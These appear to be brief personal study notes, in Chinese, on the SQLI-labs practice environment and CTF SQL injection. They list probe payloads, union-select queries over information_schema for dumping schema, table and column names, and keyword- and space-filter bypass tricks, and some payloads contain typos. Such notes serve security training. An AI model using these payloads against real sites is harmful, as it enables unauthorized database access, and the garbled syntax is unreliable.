SQLI-labs
?id=1'回显error,且?id=1'--+回显数据,则存在字符型SQL漏洞 --+后接注释
?id=-1'报错执行后续命令
group_concat(schema_name) from information_schema schemata
group_concat()函数将所有数据库中相关数据进行字符串拼接并进行一行显示
%\ 和%1$\可替换为空
a’or true ordered by 3 没出错则至少有三个库
a’or true ordered by 4 出错则至多三个库
用database()查看库里面的表名
a‘or(ture)union(select(1),database(),3)#
我们需要记得是schema,tables,columns,schema_name,table_sechma,table_name,column_name
select(group_concat(column_name))from(information_schema.columns)where(table_schema='web2')and(table_name='flag')),3)#
group_concat函数是把一系列查询操作连在一起
通常sql的题会过滤一些关键字比如空格,单引号 或者是连着的单词ordered by里的ered by(这需要抓包才知道过滤了什么)
(),/**/,//,%1a$可替换为空格 单引号可替换为双引号 单词过滤可采用复写绕过比如orderedered by by
有些网站都回显,为了判断是否存在sql注入,可以传入a=-1